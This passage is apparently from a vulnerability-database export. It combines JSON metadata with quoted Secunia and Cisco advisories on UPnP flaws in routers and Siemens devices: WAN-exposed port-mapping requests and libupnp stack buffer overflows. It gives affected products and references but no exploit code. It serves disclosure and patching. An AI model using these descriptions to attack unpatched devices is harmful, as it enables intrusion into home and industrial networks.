ADVISORY ID:\nSA52035\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/52035/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=52035\n\nRELEASE DATE:\n2013-01-31\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/52035/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/52035/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=52035\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nMultiple vulnerabilities have been reported in multiple Siemens OZW\nand OZS products, which can be exploited by malicious people to\ncompromise a vulnerable device. \n\n1) Multiple vulnerabilities are caused due to a bundled version of\nlibupnp. \n\nFor more information:\nSA51949\n\n2) Multiple boundary errors within the \"unique_service_name()\"\nfunction (ssdp/ssdp_ctrlpt.c) in libupnp when handling SSDP requests\ncan be exploited to cause stack-based buffer overflows. The vendor is planning\nto provide fixes with upcoming firmware updates. \n\nPROVIDED AND/OR DISCOVERED BY:\n2) Rapid7\n\nORIGINAL ADVISORY:\nSiemens SSA-963338:\nhttp://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-963338.pdf\n\nRapid7:\nhttps://community.rapid7.com/docs/DOC-2150\nhttps://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. This library is used in several vendor network\ndevices in addition to media streaming and file sharing applications. \nThese vulnerabilities were disclosed on January 29th, 2013 in a CERT\nVulnerability Note, VU#922681, which can be viewed at:\n\nhttp://www.kb.cert.org/vuls/id/922681\n\nCisco is currently evaluating products for possible exposure to these\nvulnerabilities. This advisory is available at the following link:\n\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130129-upnp\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.11 (GNU/Linux)\n\niF4EAREIAAYFAlEIJZ8ACgkQUddfH3/BbTrUagD9FnKSVkc2iIfGs+7c8SVPT26+\nga5hYEz9UMUnitcqnbcBAIKe6KnkR6he2zbstVtbTKtqSjE7pfVb3lTKVZSeAkM5\n=6sTu\n-----END PGP SIGNATURE-----\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2011-4499"
},
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003029"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "CNVD",
"id": "CNVD-2011-5053"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "VULHUB",
"id": "VHN-52444"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
}
],
"trust": 4.86
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#357851",
"trust": 5.8
},
{
"db": "NVD",
"id": "CVE-2011-4499",
"trust": 3.4
},
{
"db": "SIEMENS",
"id": "SSA-963338",
"trust": 0.9
},
{
"db": "CERT/CC",
"id": "VU#922681",
"trust": 0.9
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003029",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2011-5053",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "18224",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201111-361",
"trust": 0.6
},
{
"db": "BID",
"id": "50810",
"trust": 0.3
},
{
"db": "SECUNIA",
"id": "52035",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-52444",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "119949",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "119896",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5053"
},
{
"db": "VULHUB",
"id": "VHN-52444"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003029"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
},
{
"db": "NVD",
"id": "CVE-2011-4499"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-361"
}
]
},
"id": "VAR-201111-0178",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-5053"
},
{
"db": "VULHUB",
"id": "VHN-52444"
}
],
"trust": 1.4788191
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-5053"
}
]
},
"last_update_date": "2023-12-18T12:09:30.055000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.cisco.com/"
},
{
"title": "Patch for Multiple Routers UPnP WAN Interface Remote Unauthorized Access Vulnerability (CNVD-2011-5053)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/6023"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-5053"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003029"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-16",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-52444"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003029"
},
{
"db": "NVD",
"id": "CVE-2011-4499"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 4.4,
"url": "http://www.kb.cert.org/vuls/id/357851"
},
{
"trust": 2.8,
"url": "http://www.upnp-hacks.org/devices.html"
},
{
"trust": 1.6,
"url": "http://homekb.cisco.com/cisco2/ukp.aspx?vw=1\u0026articleid=28341"
},
{
"trust": 1.6,
"url": "http://jvn.jp/cert/jvnvu357851"
},
{
"trust": 0.9,
"url": "https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play"
},
{
"trust": 0.9,
"url": "https://community.rapid7.com/docs/doc-2150"
},
{
"trust": 0.9,
"url": "http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-963338.pdf"
},
{
"trust": 0.8,
"url": "http://toor.do/upnp.html"
},
{
"trust": 0.8,
"url": "http://www.h-online.com/security/news/item/upnp-enabled-routers-allow-attacks-on-lans-1329727.html"
},
{
"trust": 0.8,
"url": "http://toor.do/defcon-19-garcia-upnp-mapping-wp.pdf"
},
{
"trust": 0.8,
"url": "http://pupnp.sourceforge.net/"
},
{
"trust": 0.8,
"url": "https://community.rapid7.com/servlet/jiveservlet/download/2150-1-16596/securityflawsupnp.pdf"
},
{
"trust": 0.8,
"url": "http://www.rapid7.com/resources/free-security-software-downloads/universal-plug-and-play-jan-2013.jsp"
},
{
"trust": 0.8,
"url": "http://opentools.homeip.net/dev-tools-for-upnp"
},
{
"trust": 0.8,
"url": "http://upnp.sourceforge.net/"
},
{
"trust": 0.8,
"url": "http://www.dlink.com/us/en/technology/upnp"
},
{
"trust": 0.8,
"url": "http://jpn.nec.com/security-info/secinfo/nv13-003.html"
},
{
"trust": 0.8,
"url": "http://www.ipitomy.com/index.php/mi-security-notice-ip001"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-4499"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-4499"
},
{
"trust": 0.6,
"url": "http://www.kb.cert.org/vuls/id/357851http"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/18224"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/52035/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_intelligence/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=52035"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/52035/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/blog/325/"
},
{
"trust": 0.1,
"url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20130129-upnp"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/922681"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5053"
},
{
"db": "VULHUB",
"id": "VHN-52444"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003029"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
},
{
"db": "NVD",
"id": "CVE-2011-4499"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-361"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5053"
},
{
"db": "VULHUB",
"id": "VHN-52444"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003029"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
},
{
"db": "NVD",
"id": "CVE-2011-4499"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-361"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-10-05T00:00:00",
"db": "CERT/CC",
"id": "VU#357851"
},
{
"date": "2013-01-29T00:00:00",
"db": "CERT/CC",
"id": "VU#922681"
},
{
"date": "2011-11-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-5053"
},
{
"date": "2011-11-22T00:00:00",
"db": "VULHUB",
"id": "VHN-52444"
},
{
"date": "2011-11-24T00:00:00",
"db": "BID",
"id": "50810"
},
{
"date": "2011-11-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-003029"
},
{
"date": "2011-10-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"date": "2013-01-31T07:26:31",
"db": "PACKETSTORM",
"id": "119949"
},
{
"date": "2013-01-30T02:46:44",
"db": "PACKETSTORM",
"id": "119896"
},
{
"date": "2011-11-22T11:55:04.683000",
"db": "NVD",
"id": "CVE-2011-4499"
},
{
"date": "2011-11-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201111-361"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-11-30T00:00:00",
"db": "CERT/CC",
"id": "VU#357851"
},
{
"date": "2014-07-30T00:00:00",
"db": "CERT/CC",
"id": "VU#922681"
},
{
"date": "2011-11-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-5053"
},
{
"date": "2012-03-09T00:00:00",
"db": "VULHUB",
"id": "VHN-52444"
},
{
"date": "2015-03-19T08:33:00",
"db": "BID",
"id": "50810"
},
{
"date": "2011-11-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-003029"
},
{
"date": "2011-10-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"date": "2012-03-09T05:00:00",
"db": "NVD",
"id": "CVE-2011-4499"
},
{
"date": "2011-11-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201111-361"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201111-361"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "UPnP requests accepted over router WAN interfaces",
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "configuration error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201111-361"
}
],
"trust": 0.6
}
}
VAR-201111-0160
Vulnerability from variot - Updated: 2023-12-18 12:09The UPnP IGD implementation in the Pseudo ICS UPnP software on the ZyXEL P-330W allows remote attackers to establish arbitrary port mappings by sending a UPnP AddPortMapping action in a SOAP request to the WAN interface, related to an "external forwarding" vulnerability. The Portable SDK for UPnP Devices libupnp library contains multiple buffer overflow vulnerabilities. Devices that use libupnp may also accept UPnP queries over the WAN interface, therefore exposing the vulnerabilities to the internet. Universal Plug and Play (UPnP) Multiple compatible routers have vulnerabilities with insufficient access restrictions. Universal Plug and Play (UPnP) is a network protocol that is mostly used for personal computer device discovery and communication with other devices and the Internet. These requests can be used to connect to the internal host or proxy connection of the NAT firewall. Remote unauthenticated attackers can exploit vulnerabilities to scan internal hosts or communicate via the device proxy Internet. The following devices are affected: Cisco Linksys WRT54G firmware version prior to 4.30.5 Cisco Linksys WRT54GS v1 through v3 firmware versions prior to 4.71.1 Cisco Linksys WRT54GS v4 firmware versions prior to 1.06.1 Cisco Linksys WRT54GX firmware 2.00.05 Edimax BR-6104K prior to 3.25 Edimax 6114Wg Canyon-Tech CN-WF512 firmware version 1.83 Canyon-Tech CN-WF514 firmware version 2.08 Sitecom WL-153 prior to firmware 1.39 Sitecom WL-111 Sweex LB000021 firmware version 3.15 ZyXEL P-330W SpeedTouch 5x6 firmware versions prior to 6.2.29 Thomson TG585 firmware versions prior to 7.4.3.2. ZyXEL P-330W is a wireless broadband router. A vulnerability exists in the UPnP IGD installation enablement of the ZyXEL P-330W's Pseudo ICS UPnP software. This vulnerability is related to the \"external forwarding\" vulnerability. ----------------------------------------------------------------------
The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/
TITLE: Siemens OZW / OZS Multiple Products libupnp Buffer Overflow Vulnerabilities
SECUNIA ADVISORY ID: SA52035
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/52035/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=52035
RELEASE DATE: 2013-01-31
DISCUSS ADVISORY: http://secunia.com/advisories/52035/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/52035/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=52035
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: Multiple vulnerabilities have been reported in multiple Siemens OZW and OZS products, which can be exploited by malicious people to compromise a vulnerable device.
1) Multiple vulnerabilities are caused due to a bundled version of libupnp.
For more information: SA51949
2) Multiple boundary errors within the "unique_service_name()" function (ssdp/ssdp_ctrlpt.c) in libupnp when handling SSDP requests can be exploited to cause stack-based buffer overflows. The vendor is planning to provide fixes with upcoming firmware updates.
PROVIDED AND/OR DISCOVERED BY: 2) Rapid7
ORIGINAL ADVISORY: Siemens SSA-963338: http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-963338.pdf
Rapid7: https://community.rapid7.com/docs/DOC-2150 https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
. This library is used in several vendor network devices in addition to media streaming and file sharing applications. These vulnerabilities were disclosed on January 29th, 2013 in a CERT Vulnerability Note, VU#922681, which can be viewed at:
http://www.kb.cert.org/vuls/id/922681
Cisco is currently evaluating products for possible exposure to these vulnerabilities. This advisory is available at the following link:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130129-upnp
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux)
iF4EAREIAAYFAlEIJZ8ACgkQUddfH3/BbTrUagD9FnKSVkc2iIfGs+7c8SVPT26+ ga5hYEz9UMUnitcqnbcBAIKe6KnkR6he2zbstVtbTKtqSjE7pfVb3lTKVZSeAkM5 =6sTu -----END PGP SIGNATURE-----
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201111-0160",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "pseudoics",
"scope": "eq",
"trust": 1.6,
"vendor": "genmei mori",
"version": "0.1"
},
{
"model": "pseudoics",
"scope": "eq",
"trust": 1.6,
"vendor": "genmei mori",
"version": "0.3"
},
{
"model": "pseudoics",
"scope": "eq",
"trust": 1.6,
"vendor": "genmei mori",
"version": "0.2"
},
{
"model": "p-330w router",
"scope": "eq",
"trust": 1.0,
"vendor": "zyxel",
"version": "*"
},
{
"model": "br-6104k",
"scope": "eq",
"trust": 0.9,
"vendor": "edimax",
"version": "0"
},
{
"model": "6114wg",
"scope": "eq",
"trust": 0.9,
"vendor": "edimax",
"version": "0"
},
{
"model": "cn-wf514",
"scope": "eq",
"trust": 0.9,
"vendor": "canyon tech",
"version": "2.08"
},
{
"model": "cn-wf512",
"scope": "eq",
"trust": 0.9,
"vendor": "canyon tech",
"version": "1.83"
},
{
"model": "p-330w",
"scope": "eq",
"trust": 0.9,
"vendor": "zyxel",
"version": "0"
},
{
"model": "tg585 router",
"scope": "eq",
"trust": 0.9,
"vendor": "thomson",
"version": "0"
},
{
"model": null,
"scope": "eq",
"trust": 0.9,
"vendor": "speedtouch",
"version": "5x60"
},
{
"model": "wl-153",
"scope": "eq",
"trust": 0.9,
"vendor": "sitcom",
"version": "0"
},
{
"model": "wl-111",
"scope": "eq",
"trust": 0.9,
"vendor": "sitcom",
"version": "0"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "canyon tech",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "edimax computer",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "linksys a division of cisco",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sitecom",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sweex",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "technicolor",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "zyxel",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "axis",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "fujitsu",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "huawei",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "linksys",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "nec",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "siemens",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sony",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "synology",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "ipitomy",
"version": null
},
{
"model": "pseudo ics upnp",
"scope": null,
"trust": 0.8,
"vendor": "genmei mori",
"version": null
},
{
"model": "p-330w",
"scope": null,
"trust": 0.8,
"vendor": "zyxel",
"version": null
},
{
"model": "",
"scope": null,
"trust": 0.8,
"vendor": "multiple vendors",
"version": null
},
{
"model": "wrt54g beta/2.0",
"scope": "eq",
"trust": 0.6,
"vendor": "linksys",
"version": "4.04.20.6/4.04.0.7/3.03.3.6/3.03.1.3/2.02.4.4/2.02.02.82.00.8"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.04.20.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.04.0.7"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3.03.3.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3.03.1.3"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.4.4"
},
{
"model": "wrt54g beta",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.02.8"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.00.8"
},
{
"model": "tg585 router",
"scope": "ne",
"trust": 0.3,
"vendor": "thomson",
"version": "7.4.3.2"
},
{
"model": null,
"scope": "ne",
"trust": 0.3,
"vendor": "speedtouch",
"version": "5x66.2.29"
},
{
"model": "wl-153",
"scope": "ne",
"trust": 0.3,
"vendor": "sitcom",
"version": "1.39"
},
{
"model": "wrt54g",
"scope": "ne",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.01.0.6"
},
{
"model": "br-6104k",
"scope": "ne",
"trust": 0.3,
"vendor": "edimax",
"version": "3.25"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5060"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003034"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "NVD",
"id": "CVE-2011-4504"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-366"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:genmei_mori:pseudoics:0.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:genmei_mori:pseudoics:0.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:genmei_mori:pseudoics:0.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:zyxel:p-330w_router:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2011-4504"
}
]
},
